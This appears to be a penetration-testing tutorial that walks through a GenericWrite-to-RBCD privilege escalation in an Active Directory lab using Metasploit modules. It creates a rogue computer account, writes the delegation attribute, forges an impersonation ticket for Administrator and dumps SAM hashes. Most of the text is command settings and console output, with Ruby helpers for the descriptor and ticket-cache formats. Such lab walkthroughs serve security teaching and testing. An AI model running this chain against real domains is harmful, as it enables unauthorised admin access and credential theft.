Metasploit recently shipped version 6.3, which brings a lot of new functionality around LDAP operations and Kerberos authentication. In this post I'll walk through a GenericWrite -> RBCD attack, which is a very common one. Often a user doesn't have administrative access to a computer but does have GenericWrite (or an equivalent right such as GenericAll or ownership) over the computer object. What actually matters is the ability to write the computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which any of those rights gives you; abusing that gets you administrative access to the computer. Today there are two main ways to perform this attack: a combination of Rubeus, Powermad and PowerView, or the various Impacket scripts.
To show off some of the new functionality, I'll compare each Metasploit module with its Impacket counterpart.
First, this attack requires a computer account. If you don't already control one you'll need to create one, which relies on the domain's MachineAccountQuota (10 by default) still allowing ordinary users to add computers. In Impacket we would use addcomputer.py; here we use auxiliary/admin/dcerpc/samr_computer. The module generates a random password for the new account and prints it together with the account's SID; both are needed later.
```
msf6 auxiliary(admin/dcerpc/samr_computer)> show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
SMBUser n00py no The username to authenticate as
When ACTION is ADD_COMPUTER:
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_PASSWORD no The password for the new computer
Auxiliary action:
Name Description
---- -----------
ADD_COMPUTER Add a computer account
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 172.16.73.6
[+] 172.16.73.6:445 - Successfully created n00py.local\DESKTOP-MKFA61G6$
[+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
[+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
[*] Auxiliary module execution completed
```
Once you have a new computer account, the next step is to configure delegation on the victim computer. In Impacket we would use rbcd.py; here we use auxiliary/admin/ldap/rbcd. DELEGATE_FROM is the account we control (the new computer account), DELEGATE_TO is the victim computer object, and the bind is done as the low-privileged user who holds GenericWrite over it. The module's READ action shows the current contents of msDS-AllowedToActOnBehalfOfOtherIdentity (empty here, so we are not clobbering an existing delegation), WRITE adds our account's SID, and reading again confirms the change.
```
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation source
DELEGATE_TO WIN-27M967MQJL4$ yes The delegation target
DOMAIN n00py.local no The domain to authenticate to
PASSWORD Password1 no The password to authenticate with
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME n00py no The username to authenticate with
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
```
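What the WRITE action stores, and what READ decodes back into the SID list above, is a self-relative Windows security descriptor whose DACL carries one ACCESS_ALLOWED_ACE per delegating account. The following Ruby is an added example (not code from this post or from the Metasploit module) that builds and parses such a descriptor using the MS-DTYP layout; the owner SID (BUILTIN\Administrators) and the full-control access mask follow what Impacket's rbcd.py writes, and the SID is the one the samr_computer run above printed.

```ruby
# Added example: build and decode the self-relative security descriptor held in
# msDS-AllowedToActOnBehalfOfOtherIdentity (layout per MS-DTYP). Not the rbcd
# module's own code; an independent illustration of the attribute's format.

FULL_CONTROL            = 0x000F01FF   # 983551, the mask Impacket's rbcd.py grants
SE_DACL_PRESENT         = 0x0004
SE_SELF_RELATIVE        = 0x8000
ACL_REVISION_DS         = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00

# "S-1-5-21-..." -> binary SID: Revision, SubAuthorityCount, 48-bit big-endian
# IdentifierAuthority, then 32-bit little-endian sub-authorities.
def sid_to_bin(sid)
  parts = sid.split('-')
  raise ArgumentError, "not a SID: #{sid}" unless parts[0] == 'S' && parts.length >= 3
  subs = parts[3..-1].map { |s| Integer(s) }
  [Integer(parts[1]), subs.length].pack('CC') +
    [Integer(parts[2])].pack('Q>')[2, 6] +
    subs.pack('V*')
end

def bin_to_sid(bin, offset = 0)
  revision, count = bin[offset, 2].unpack('CC')
  authority = ("\x00\x00".b + bin[offset + 2, 6]).unpack1('Q>')
  subs = bin[offset + 8, 4 * count].unpack('V*')
  ["S-#{revision}-#{authority}", *subs].join('-')
end

# Descriptor: 20-byte header, owner SID, then a DACL with one allow ACE per SID.
def build_rbcd_sd(delegate_sids, owner: 'S-1-5-32-544')
  owner_bin = sid_to_bin(owner)
  aces = delegate_sids.map do |sid|
    sid_bin = sid_to_bin(sid)
    # ACE header: type, flags, size; then the access mask and the trustee SID
    [ACCESS_ALLOWED_ACE_TYPE, 0, 8 + sid_bin.bytesize, FULL_CONTROL].pack('CCvV') + sid_bin
  end
  acl_body = aces.join
  # ACL header: revision, sbz1, size, ace count, sbz2
  dacl = [ACL_REVISION_DS, 0, 8 + acl_body.bytesize, aces.length, 0].pack('CCvvv') + acl_body
  offset_owner = 20
  offset_dacl  = offset_owner + owner_bin.bytesize
  # Header: revision, sbz1, control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
  [1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, offset_owner, 0, 0, offset_dacl].pack('CCvVVVV') +
    owner_bin + dacl
end

# Returns the SIDs that ACCESS_ALLOWED_ACEs in the DACL grant, i.e. the accounts
# allowed to delegate to this computer.
def parse_rbcd_sd(sd)
  revision, _sbz1, control, _off_owner, _off_group, _off_sacl, off_dacl = sd.unpack('CCvVVVV')
  raise ArgumentError, 'unsupported SD revision' unless revision == 1
  return [] if (control & SE_DACL_PRESENT).zero? || off_dacl.zero?
  _rev, _sbz, _size, ace_count, _sbz2 = sd[off_dacl, 8].unpack('CCvvv')
  pos = off_dacl + 8
  sids = []
  ace_count.times do
    type, _flags, size, _mask = sd[pos, 8].unpack('CCvV')
    sids << bin_to_sid(sd, pos + 8) if type == ACCESS_ALLOWED_ACE_TYPE
    pos += size
  end
  sids
end

if __FILE__ == $0
  desktop = 'S-1-5-21-3387312503-3460017432-368973690-1135'   # DESKTOP-MKFA61G6$ from the run above
  sd = build_rbcd_sd([desktop])
  puts "#{sd.bytesize}-byte descriptor, allowed: #{parse_rbcd_sd(sd).inspect}"
end
```

The whole thing is only 80 bytes for one trustee, and the KDC cares about which SIDs appear in the DACL, not about the attribute being pretty: that is why checking the existing value with READ first matters, since a WRITE that replaces the attribute would silently drop any delegation a legitimate service already had.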
With delegation configured we can request a service ticket for any user. In Impacket we would use getST.py; here we use auxiliary/admin/kerberos/get_ticket, authenticating as the new computer account with the password samr_computer generated. With IMPERSONATE set the module first obtains a TGT for our account, then performs S4U2Self followed by S4U2Proxy, so three credential-cache files land in loot: the TGT, the S4U2Self ticket and the S4U2Proxy service ticket for the requested SPN. The last one saved is the service ticket we'll use. Note that the SPN host must be the victim's FQDN (WIN-27M967MQJL4.n00py.local), not the domain controller we are talking to.
```
msf6 auxiliary(admin/kerberos/get_ticket) > show options
Module options (auxiliary/admin/kerberos/get_ticket):
Name Current Setting Required Description
---- --------------- -------- -----------
AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
CERT_FILE no The PKCS12 (.pfx) certificate file to authenticate with
CERT_PASSWORD no The certificate file's password
DOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
NTHASH no The NT hash in hex string. Server must support RC4
PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's password
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME DESKTOP-MKFA61G6$ no The domain user
When ACTION is GET_TGS:
Name Current Setting Required Description
---- --------------- -------- -----------
IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local
Auxiliary action:
Name Description
---- -----------
GET_TGS Request a Ticket-Granting-Service (TGS)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run
[*] Running module against 172.16.73.6
[+] 172.16.73.6:88 - Received a valid TGT-Response
[*] 172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
[*] 172.16.73.6:88 - Getting TGS impersonating Administrator@n00py.local (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
[+] 172.16.73.6:88 - Received a valid TGS-Response
[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
[+] 172.16.73.6:88 - Received a valid TGS-Response
[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
[*] Auxiliary module execution completed
```
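The three files above are MIT credential caches, and the only way to tell them apart without `klist` is by the client and server principals inside each one. The Ruby below is an added example (not part of this post or of Metasploit) with a minimal writer and reader for the 0x0504 cache format; it constructs three sample caches mirroring the run above (the mapping of file name to ticket is inferred from the order in which they were saved, and keys and ticket bodies are placeholder bytes) and classifies each as TGT, S4U2Self or S4U2Proxy. The reader also works on the real loot files.

```ruby
# Added example: minimal MIT credential-cache (version 0x0504) writer and reader,
# used to tell the TGT, the S4U2Self ticket and the S4U2Proxy ticket apart.
# Independent illustration; not the page's or Metasploit's code.

NT_PRINCIPAL = 1
NT_SRV_INST  = 2

def enc_data(bytes)
  [bytes.bytesize].pack('N') + bytes
end

# Principal: name type, component count, realm, components (all lengths big-endian).
def enc_principal(realm, components, name_type)
  [name_type, components.length].pack('NN') + enc_data(realm) +
    components.map { |c| enc_data(c) }.join
end

# One credential record; client/server are [realm, components, type] triples.
# Key and ticket bytes are constructed placeholders.
def enc_cred(client, server, enctype: 18, key: "\x00" * 32, ticket: 'TICKET', endtime: 0)
  enc_principal(*client) + enc_principal(*server) +
    [enctype].pack('n') + enc_data(key) +     # keyblock (v4 carries a single enctype field)
    [0, 0, endtime, 0].pack('NNNN') +         # authtime, starttime, endtime, renew_till
    [0].pack('C') + [0].pack('N') +           # is_skey, ticket_flags
    [0].pack('N') + [0].pack('N') +           # num_address, num_authdata
    enc_data(ticket) + enc_data('')           # ticket, second_ticket
end

def build_ccache(default_principal, creds)
  header = [1, 8].pack('nn') + [0, 0].pack('NN')   # one DeltaTime header field
  [0x0504].pack('n') + [header.bytesize].pack('n') + header +
    enc_principal(*default_principal) + creds.join
end

class CcacheReader
  def initialize(data)
    @d = data
    @pos = 0
  end

  def read(n)
    s = @d[@pos, n]
    raise 'truncated ccache' if s.nil? || s.bytesize < n
    @pos += n
    s
  end

  def u8;  read(1).unpack1('C'); end
  def u16; read(2).unpack1('n'); end
  def u32; read(4).unpack1('N'); end
  def data; read(u32); end

  def principal
    u32                                   # name type, not needed for display
    n = u32
    realm = data
    "#{Array.new(n) { data }.join('/')}@#{realm}"
  end

  def parse
    version = u16
    raise "unsupported ccache version 0x#{version.to_s(16)}" unless version == 0x0504
    read(u16)                             # header block, skipped
    default = principal
    creds = []
    until @pos >= @d.bytesize
      client = principal
      server = principal
      enctype = u16
      data                                # session key
      u32; u32; endtime = u32; u32        # authtime, starttime, endtime, renew_till
      u8                                  # is_skey
      u32                                 # ticket_flags
      u32.times { u16; data }             # addresses
      u32.times { u16; data }             # authorization data
      data                                # ticket
      data                                # second_ticket
      creds << { client: client, server: server, enctype: enctype, endtime: endtime }
    end
    { default_principal: default, credentials: creds }
  end
end

# Which step of the chain produced a ticket, judged from its client/server pair.
def classify(cred, impersonated, spn)
  if cred[:server].start_with?('krbtgt/')
    'TGT'
  elsif cred[:client] == impersonated && cred[:server] == spn
    'S4U2Proxy'
  elsif cred[:client] == impersonated
    'S4U2Self'
  else
    'other'
  end
end

# Constructed samples mirroring the three files saved above (one ticket per file).
REALM   = 'N00PY.LOCAL'
DESKTOP = [REALM, ['DESKTOP-MKFA61G6$'], NT_PRINCIPAL]
ADMIN   = [REALM, ['Administrator'], NT_PRINCIPAL]
KRBTGT  = [REALM, ['krbtgt', REALM], NT_SRV_INST]
CIFS    = [REALM, ['CIFS', 'WIN-27M967MQJL4.n00py.local'], NT_SRV_INST]
SAMPLE_FILES = {
  'cca_994901.bin' => build_ccache(DESKTOP, [enc_cred(DESKTOP, KRBTGT)]),
  'cca_606526.bin' => build_ccache(DESKTOP, [enc_cred(ADMIN, DESKTOP)]),
  'cca_662784.bin' => build_ccache(DESKTOP, [enc_cred(ADMIN, CIFS)])
}

def classify_file(blob)
  cc = CcacheReader.new(blob).parse
  classify(cc[:credentials].first, "Administrator@#{REALM}",
           "CIFS/WIN-27M967MQJL4.n00py.local@#{REALM}")
end

if __FILE__ == $0
  SAMPLE_FILES.each { |name, blob| puts "#{name}: #{classify_file(blob)}" }
end
```

The S4U2Self ticket is the one whose client is the impersonated user but whose server is our own computer account; it is only an intermediate step and is of no use against the victim. The ticket worth keeping is the one whose server principal is the SPN we asked for, which is also the only one the secrets dump below will accept.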
Finally, with that ticket in hand we can perform administrative actions on the target. Pentesters would usually reach for Impacket's secretsdump.py or CrackMapExec (which uses the same code underneath) to recover credentials from the system. Instead we can use Metasploit's auxiliary/gather/windows_secrets_dump module, which is the equivalent of running CrackMapExec with both --sam and --lsa. The only tricky part is getting it to work with Kerberos authentication, which means going into the advanced options: SMB::Auth is set to kerberos, SMB::Krb5Ccname points at the S4U2Proxy ccache saved by get_ticket, SMB::Rhostname is the victim's FQDN and must match the host in the SPN the ticket was issued for, and DomainControllerRhost names the DC. SMBUser is Administrator (the impersonated user) and SMBPass stays empty, because the ticket does the authenticating. Note that RHOSTS is now the victim (172.16.73.12), not the domain controller.
```
msf6 auxiliary(gather/windows_secrets_dump) > show options
Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser Administrator no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ALL Dump everything
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > show advanced
Module advanced options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
[TRUNCATED]
SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
[TRUNCATED]
Active when SMB::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain Controller
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authentication
SMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offer
SMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPN
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to \svcctl...
[+] 172.16.73.12:445 - Bound to \svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Skew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\GBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Data
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
```
Credentials! This is just a lab box, but on a real target you would likely find plenty of juicy credentials to reuse elsewhere. There is of course a lot more post-exploitation you can do with Metasploit; the goal here was simply to show how to drive modules with a service ticket and Kerberos authentication.
Will this replace Impacket? Probably not, but I always like having more tools in the toolbox.